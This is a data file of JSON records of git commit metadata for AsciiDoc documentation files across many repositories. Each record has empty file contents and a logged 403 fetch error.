{"commit":"27dc7b0462b41af0b2cca74fb648f4718290d033","subject":"Update 2018-03-15-try-ecr.adoc","message":"Update 2018-03-15-try-ecr.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-15-try-ecr.adoc","new_file":"_posts\/2018-03-15-try-ecr.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"847089f959efbe142e2ae8f51915b3b43e018224","subject":"drop a [horizontal] definition table","message":"drop a [horizontal] definition table\n\nThe two columns of the table run together, making it hard to read.\n","repos":"mohamed\/ninja,bradking\/ninja,mydongistiny\/ninja,fuchsia-mirror\/third_party-ninja,ndsol\/subninja,atetubou\/ninja,Qix-\/ninja,martine\/ninja,sgraham\/ninja,automeka\/ninja,vvvrrooomm\/ninja,tfarina\/ninja,sxlin\/dist_ninja,nafest\/ninja,sgraham\/ninja,atetubou\/ninja,iwadon\/ninja,nafest\/ninja,mydongistiny\/ninja,nicolasdespres\/ninja,sxlin\/dist_ninja,moroten\/ninja,martine\/ninja,atetubou\/ninja,mohamed\/ninja,mydongistiny\/ninja,sxlin\/dist_ninja,nafest\/ninja,maruel\/ninja,Maratyszcza\/ninja-pypi,nafest\/ninja,moroten\/ninja,bradking\/ninja,nico\/ninja,tfarina\/ninja,ndsol\/subninja,lizh06\/ninja,juntalis\/ninja,fuchsia-mirror\/third_party-ninja,vvvrrooomm\/ninja,moroten\/ninja,mohamed\/ninja,ninja-build\/ninja,nico\/ninja,mgaunard\/ninja,bradking\/ninja,lizh06\/ninja,automeka\/ninja,maruel\/ninja,nicolasdespres\/ninja,tfarina\/ninja,ninja-build\/ninja,Qix-\/ninja,vvvrrooomm\/ninja,ndsol\/subninja,sxlin\/dist_ninja,ninja-build\/ninja,martine\/ninja,fuchsia-mirror\/third_party-ninja,nico\/ninja,lizh06\/ninja,vvvrrooomm\/ninja,fuchsia-mirror\/third_party-ninja,juntalis\/ninja,sxlin\/dist_ninja,juntalis\/ninja,sxlin\/dist_ninja,automeka\/ninja,atetubou\/ninja,tfarina\/ninja,Maratyszcza\/ninja-pypi,AoD314\/ninja,ninja-build\/ninja,AoD314\/ninja,bradking\/ninja,lizh06\/ninja,nicolasdespres\/ninja,maruel\/ninja,Maratyszcza\/ninja-pypi,mydongistiny\/ninja,mohamed\/ninja,nico\/ninja,AoD314\/ninja,mgaunard\/ninja,AoD314\/ninja,martine\/ninja,moroten\/ninja,juntalis\/ninja,Qix-\/ninja,iwadon\/ninja,Maratyszcza\/ninja-pypi,iwadon\/ninja,ndsol\/subninja,iwadon\/ninja,sxlin\/dist_ninja,mgaunard\/ninja,nicolasdespres\/ninja,sgraham\/ninja,maruel\/ninja,mgaunard\/ninja,sgraham\/ninja,Qix-\/ninja,automeka\/ninja","old_file":"doc\/manual.asciidoc","new_file":"doc\/manual.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nafest\/ninja.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3474fbc0b1487bc3b6a55c50f435523d9f17e5dd","subject":"Update 20161110-1232.adoc","message":"Update 20161110-1232.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"_posts\/20161110-1232.adoc","new_file":"_posts\/20161110-1232.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"adee3f6335bb29bb686918cdb4981ee4fe55e3e6","subject":"Update 
2015-04-13-Pourquoi-je-suis-passe-de-Wordpress-a-HubPress.adoc","message":"Update 2015-04-13-Pourquoi-je-suis-passe-de-Wordpress-a-HubPress.adoc","repos":"jabbytechnologies\/blog,jabbytechnologies\/blog,jabbytechnologies\/blog,jabbytechnologies\/blog","old_file":"_posts\/2015-04-13-Pourquoi-je-suis-passe-de-Wordpress-a-HubPress.adoc","new_file":"_posts\/2015-04-13-Pourquoi-je-suis-passe-de-Wordpress-a-HubPress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabbytechnologies\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8afcce4ab58baa5fc856b21dbb9f62a56ff650e2","subject":"Create BindingToEngine.adoc","message":"Create BindingToEngine.adoc","repos":"igagis\/morda,igagis\/morda,igagis\/morda","old_file":"wiki\/tutorials\/BindingToEngine.adoc","new_file":"wiki\/tutorials\/BindingToEngine.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/igagis\/morda.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"29ff320e07e4122f25da75268f46aab2c1534082","subject":"`emerald_revealAccount` isn't good name to unhide hidden account","message":"`emerald_revealAccount` isn't good name to unhide hidden account\n\nChange to `emerald_unhideAccount`.\n","repos":"dulanov\/emerald-rs","old_file":"docs\/api.adoc","new_file":"docs\/api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ec1f67579a6b3f9ac2e8647daf5e7a8baeb13dd0","subject":"Update 2015-07-02-HubPress-Themes.adoc","message":"Update 2015-07-02-HubPress-Themes.adoc","repos":"tedbergeron\/hubpress.io,tedbergeron\/hubpress.io,tedbergeron\/hubpress.io,tedbergeron\/hubpress.io","old_file":"_posts\/2015-07-02-HubPress-Themes.adoc","new_file":"_posts\/2015-07-02-HubPress-Themes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tedbergeron\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb1b1d5d397c2cf1e23ef0ddf5f293a8b2b6c6c7","subject":"Add dokku\/README.adoc","message":"Add dokku\/README.adoc\n","repos":"10sr\/server-provisions,10sr\/machine-setups,10sr\/machine-setups,10sr\/machine-setups,10sr\/server-provisions,10sr\/machine-setups","old_file":"conoha\/roles\/dokku\/README.adoc","new_file":"conoha\/roles\/dokku\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/10sr\/machine-setups.git\/': The requested URL returned error: 403\n","license":"unlicense","lang":"AsciiDoc"} {"commit":"da62d28ccfb824a99cf4029cb8401d37c61e8877","subject":"added some notes about presentation tools (OBS, Idea presentation assistant and Mouse Highlight)","message":"added some notes about presentation tools (OBS, Idea presentation assistant and Mouse Highlight)\n","repos":"virgo47\/litterbin,virgo47\/litterbin,virgo47\/litterbin,virgo47\/litterbin,virgo47\/litterbin,virgo47\/litterbin,virgo47\/litterbin","old_file":"notes\/presentation-tools.adoc","new_file":"notes\/presentation-tools.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/virgo47\/litterbin.git\/': The requested URL returned error: 
403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"f982776ae178a1baaba8e343d73b74cdc0eea965","subject":"Publish 2017-02-21.adoc","message":"Publish 2017-02-21.adoc","repos":"luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io","old_file":"2017-02-21.adoc","new_file":"2017-02-21.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/luckypoem\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"034c0ba7a70a5046c85da27742c569a6e0d7e35a","subject":"Update 2015-10-09-Repeatable-annotations.adoc","message":"Update 2015-10-09-Repeatable-annotations.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2015-10-09-Repeatable-annotations.adoc","new_file":"_posts\/2015-10-09-Repeatable-annotations.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"73e4b723b35762035958fd0789f5b2153bcfce55","subject":"CAMEL-11158 - Added docs","message":"CAMEL-11158 - Added docs\n","repos":"CodeSmell\/camel,gnodet\/camel,christophd\/camel,pmoerenhout\/camel,alvinkwekel\/camel,pax95\/camel,tdiesler\/camel,nicolaferraro\/camel,nikhilvibhav\/camel,punkhorn\/camel-upstream,christophd\/camel,apache\/camel,pmoerenhout\/camel,cunningt\/camel,zregvart\/camel,onders86\/camel,dmvolod\/camel,kevinearls\/camel,tadayosi\/camel,cunningt\/camel,ullgren\/camel,dmvolod\/camel,tadayosi\/camel,DariusX\/camel,anoordover\/camel,DariusX\/camel,apache\/camel,pax95\/camel,onders86\/camel,anoordover\/camel,pax95\/camel,objectiser\/camel,gnodet\/camel,anoordover\/camel,objectiser\/camel,zregvart\/camel,jamesnetherton\/camel,kevinearls\/camel,christophd\/camel,pmoerenhout\/camel,adessaigne\/camel,punkhorn\/camel-upstream,kevinearls\/camel,zregvart\/camel,apache\/camel,pmoerenhout\/camel,onders86\/camel,ullgren\/camel,dmvolod\/camel,cunningt\/camel,kevinearls\/camel,nicolaferraro\/camel,cunningt\/camel,anoordover\/camel,Fabryprog\/camel,alvinkwekel\/camel,gnodet\/camel,jamesnetherton\/camel,pax95\/camel,sverkera\/camel,nikhilvibhav\/camel,kevinearls\/camel,dmvolod\/camel,pax95\/camel,Fabryprog\/camel,adessaigne\/camel,sverkera\/camel,alvinkwekel\/camel,CodeSmell\/camel,davidkarlsen\/camel,dmvolod\/camel,christophd\/camel,christophd\/camel,adessaigne\/camel,tadayosi\/camel,gnodet\/camel,punkhorn\/camel-upstream,pmoerenhout\/camel,onders86\/camel,nikhilvibhav\/camel,cunningt\/camel,tdiesler\/camel,mcollovati\/camel,objectiser\/camel,dmvolod\/camel,tdiesler\/camel,kevinearls\/camel,CodeSmell\/camel,pax95\/camel,davidkarlsen\/camel,tdiesler\/camel,nicolaferraro\/camel,ullgren\/camel,tdiesler\/camel,apache\/camel,sverkera\/camel,jamesnetherton\/camel,alvinkwekel\/camel,tdiesler\/camel,punkhorn\/camel-upstream,ullgren\/camel,pmoerenhout\/camel,anoordover\/camel,adessaigne\/camel,apache\/camel,onders86\/camel,cunningt\/camel,CodeSmell\/camel,jamesnetherton\/camel,jamesnetherton\/camel,onders86\/camel,davidkarlsen\/camel,tadayosi\/camel,mcollovati\/camel,christophd\/camel,nicolaferraro\/camel,tadayosi\/camel,mcollovati\/camel,apache\/camel,tadayosi\/camel,Fabryprog\/camel,DariusX\/camel,sverkera\/camel,Dar
iusX\/camel,anoordover\/camel,jamesnetherton\/camel,nikhilvibhav\/camel,sverkera\/camel,adessaigne\/camel,Fabryprog\/camel,zregvart\/camel,gnodet\/camel,objectiser\/camel,mcollovati\/camel,sverkera\/camel,adessaigne\/camel,davidkarlsen\/camel","old_file":"components\/camel-kubernetes\/src\/main\/docs\/kubernetes-job-component.adoc","new_file":"components\/camel-kubernetes\/src\/main\/docs\/kubernetes-job-component.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a752c94cd8ca39994f9d0026dd289c27a883c7e2","subject":"Update 2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","message":"Update 2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","new_file":"_posts\/2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8dd02d9349feb84c6c45e71ac1f7ea697db92bf4","subject":"Update 2016-10-26-Gabe-engages-in-shoddy-academics.adoc","message":"Update 2016-10-26-Gabe-engages-in-shoddy-academics.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/2016-10-26-Gabe-engages-in-shoddy-academics.adoc","new_file":"_posts\/2016-10-26-Gabe-engages-in-shoddy-academics.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2b3de893e3260955f6420198c4ee7ec0aad02579","subject":"Issue #519: Create a new sample section in the docs with links to examples","message":"Issue #519: Create a new sample section in the docs with links to examples\n","repos":"codeconsole\/grails-spring-security-core,grails-plugins\/grails-spring-security-core,grails-plugins\/grails-spring-security-core,codeconsole\/grails-spring-security-core","old_file":"plugin\/src\/docs\/examples.adoc","new_file":"plugin\/src\/docs\/examples.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails-plugins\/grails-spring-security-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0372dfa002918119554afa9b94e6b42d1b6af943","subject":"Update 2016-03-20-Douleurs-extremes-a-latterrissage-en-avion.adoc","message":"Update 2016-03-20-Douleurs-extremes-a-latterrissage-en-avion.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-Douleurs-extremes-a-latterrissage-en-avion.adoc","new_file":"_posts\/2016-03-20-Douleurs-extremes-a-latterrissage-en-avion.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8920d0615abcb1613d1a451c4c6206bc43161b8c","subject":"Add readme","message":"Add 
readme\n","repos":"dgengtek\/scripts,dgengtek\/scripts","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dgengtek\/scripts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"89243fb9ace8f1ac00b1551c6a8f64fa3da73dd1","subject":"document the changes","message":"document the changes\n","repos":"getreu\/asciidoctor-fopub,getreu\/asciidoctor-fopub,getreu\/asciidoctor-fopub","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/getreu\/asciidoctor-fopub.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6776bcb1cc786c069d526ff30f2de766d912eab3","subject":"Testing the asciidoc format on github","message":"Testing the asciidoc format on github\n","repos":"ralt\/lxc-wrapper","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ralt\/lxc-wrapper.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c1577ccca77a397dd4d3bbb40b2911399246c33d","subject":"build status added on readme.","message":"build status added on readme.\n","repos":"iyzico\/boot-mon,iyzico\/boot-mon","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iyzico\/boot-mon.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1e783ae2f91a83dee3c82bc3c46d0e60187e0c40","subject":"readme: Explain how to install the dotfiles","message":"readme: Explain how to install the dotfiles\n\nThe most annoying part about having a dotfiles repository is how to\nmanage them. There are several options, from using programs specifically\ndesigned for that purpose to creating your own scripts.\n\nI personally believe that using GNU Stow is the most elegant solution,\nbecause it tends to 'just work' and because it makes you organize your\ndotfiles into topics.\n\nThis section is rather detailed (it includes an example configuration),\nbecause the whole installation *process* should be as painless as\npossible. 
This means it should not only be easy to install the dotfiles,\nbut just as easy to read *how* to install them.\n","repos":"PigeonF\/.dotfiles","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PigeonF\/.dotfiles.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2416b030c60d4c287a7c521dfac5459262773ead","subject":"Cleanup syntax; link to GH repo for emailext","message":"Cleanup syntax; link to GH repo for emailext\n","repos":"jenkinsci\/pipeline-maven-plugin,netceler\/pipeline-maven-plugin,jenkinsci\/pipeline-maven-plugin,netceler\/pipeline-maven-plugin","old_file":"FAQ.adoc","new_file":"FAQ.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenkinsci\/pipeline-maven-plugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"57e231b72135fe9c3e00f3cb6515cb586624d3af","subject":"Add index adoc document","message":"Add index adoc document\n","repos":"globus\/globus-cli,globus\/globus-cli","old_file":"adoc\/index.adoc","new_file":"adoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/globus\/globus-cli.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"61345c3b25df7774ed4c80cc76ac725f6b1d5e63","subject":"Update 2014-01-15-More-Than-140.adoc","message":"Update 2014-01-15-More-Than-140.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2014-01-15-More-Than-140.adoc","new_file":"_posts\/2014-01-15-More-Than-140.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fbcef72e6c52f2055c7982bbe4423415acd5d69c","subject":"Update 2018-02-26-newton-method.adoc","message":"Update 2018-02-26-newton-method.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-26-newton-method.adoc","new_file":"_posts\/2018-02-26-newton-method.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2666cd571b9b935a9252c47eec9b910af31e347d","subject":"Update 2015-10-25-Back-to-Basic.adoc","message":"Update 2015-10-25-Back-to-Basic.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-10-25-Back-to-Basic.adoc","new_file":"_posts\/2015-10-25-Back-to-Basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"367771b64c670493d47524385801a6b6e4479d2f","subject":"Replace references to couchbase by mysql","message":"Replace references to couchbase by 
mysql","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch06-swarm.adoc","new_file":"developer-tools\/java\/chapters\/ch06-swarm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7cb3f241d64e6ef85477bb20a553647a348785a9","subject":"Small commit to hopefully fix build erroring","message":"Small commit to hopefully fix build erroring\n","repos":"oskopek\/carcv,sk413025\/carcv,oskopek\/carcv,oskopek\/carcv,oskopek\/carcv,sk413025\/carcv,sk413025\/carcv,oskopek\/carcv,oskopek\/carcv,sk413025\/carcv,sk413025\/carcv,sk413025\/carcv","old_file":"AUTHORS.adoc","new_file":"AUTHORS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sk413025\/carcv.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d22db91a297627f5421dd6baf5f2dd714ed25c3e","subject":"Update 2018-09-22-HTT-Prty-JSON-requests-and-the-right-Content-Type.adoc","message":"Update 2018-09-22-HTT-Prty-JSON-requests-and-the-right-Content-Type.adoc","repos":"TRex22\/blog,TRex22\/blog,TRex22\/blog","old_file":"_posts\/2018-09-22-HTT-Prty-JSON-requests-and-the-right-Content-Type.adoc","new_file":"_posts\/2018-09-22-HTT-Prty-JSON-requests-and-the-right-Content-Type.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TRex22\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3cf9ffa681f29554fc90f5ea2f78ceb62e28b396","subject":"Publish 2016-7-19-and.adoc","message":"Publish 2016-7-19-and.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-7-19-and.adoc","new_file":"2016-7-19-and.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f9795b3928b45db16501295c2464bde0ac488ec","subject":"Update Asciidoctor.adoc","message":"Update Asciidoctor.adoc","repos":"smru\/Documentation,smru\/Documentation","old_file":"Linux\/Asciidoctor.adoc","new_file":"Linux\/Asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/smru\/Documentation.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"414d3bba50c89419d7594feba71549a0e2a50ece","subject":"Template and parameters are merged with the rest of the text","message":"Template and parameters are merged with the rest of the text\n\nHighlight them with bold and monospace respectively\n","repos":"dulanov\/emerald-rs","old_file":"docs\/api.adoc","new_file":"docs\/api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5760d1ab52d823803fbb7d7624afede8edcef395","subject":"Some examples have minor mistakes","message":"Some examples have minor mistakes\n\nFix 
them.\n","repos":"dulanov\/emerald-rs","old_file":"docs\/cli.adoc","new_file":"docs\/cli.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"219922e4d408b06e1d792570b82932ee77750c8a","subject":"y2b create post You Can Make Your Wired Headphones Wireless...","message":"y2b create post You Can Make Your Wired Headphones Wireless...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-08-28-You-Can-Make-Your-Wired-Headphones-Wireless.adoc","new_file":"_posts\/2017-08-28-You-Can-Make-Your-Wired-Headphones-Wireless.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bd92357d8f03a04464435be82a98c4c834302ef8","subject":"Update 2015-07-16-Mapping-DevExpress-controls-from-WinForms-controls.adoc","message":"Update 2015-07-16-Mapping-DevExpress-controls-from-WinForms-controls.adoc","repos":"rrrhys\/blog.codeworkshop.com.au,rrrhys\/blog.codeworkshop.com.au,rrrhys\/blog.codeworkshop.com.au","old_file":"_posts\/2015-07-16-Mapping-DevExpress-controls-from-WinForms-controls.adoc","new_file":"_posts\/2015-07-16-Mapping-DevExpress-controls-from-WinForms-controls.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rrrhys\/blog.codeworkshop.com.au.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dffcf2c7878330e2a121349c317ba5aff3ec780f","subject":"Publish 2016-6-29-PHPER-RBAC.adoc","message":"Publish 2016-6-29-PHPER-RBAC.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-29-PHPER-RBAC.adoc","new_file":"2016-6-29-PHPER-RBAC.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"81670a76cb2b175af08c801bd12a261460b25863","subject":"Update 2015-04-30-Automaticke-overovani-DHPC-pripojeni.adoc","message":"Update 2015-04-30-Automaticke-overovani-DHPC-pripojeni.adoc","repos":"silesnet\/silesnet.github.io,silesnet\/silesnet.github.io,silesnet\/silesnet.github.io","old_file":"_posts\/2015-04-30-Automaticke-overovani-DHPC-pripojeni.adoc","new_file":"_posts\/2015-04-30-Automaticke-overovani-DHPC-pripojeni.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/silesnet\/silesnet.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3dbc40dac67a0d67acfda2b743e0423b275b1792","subject":"Update 2018-02-13-android-with-google-cloud-vision-api.adoc","message":"Update 
2018-02-13-android-with-google-cloud-vision-api.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-13-android-with-google-cloud-vision-api.adoc","new_file":"_posts\/2018-02-13-android-with-google-cloud-vision-api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"857bcf1e21e0249f64221f6771eabc7c3e707d74","subject":"documentation about cljs-specifics","message":"documentation about cljs-specifics\n","repos":"juxt\/tick,juxt\/tick","old_file":"doc\/cljs.adoc","new_file":"doc\/cljs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/juxt\/tick.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fdfa83f41e75093a1c7b8652b1da2adb948dab2c","subject":"up with sponsors + links","message":"up with sponsors + links\n","repos":"feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org","old_file":"_posts\/2017-09-01-fud5-day4.adoc","new_file":"_posts\/2017-09-01-fud5-day4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/feelpp\/www.feelpp.org.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9099b2995bf4a2c38abb8b7f3f8c2ed9c9266b6f","subject":"update index.html: remove \"rather old\"","message":"update index.html: remove \"rather old\"\n","repos":"dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core","old_file":"trex_index.asciidoc","new_file":"trex_index.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2b95421873a04e774c9a0cf8554cc71f804de837","subject":"Update 2017-06-11-vimmer1.adoc","message":"Update 2017-06-11-vimmer1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-11-vimmer1.adoc","new_file":"_posts\/2017-06-11-vimmer1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b98f4dc46247d4dc68996ef930903b39123a2fbf","subject":"Update 2017-07-04-Azure-5.adoc","message":"Update 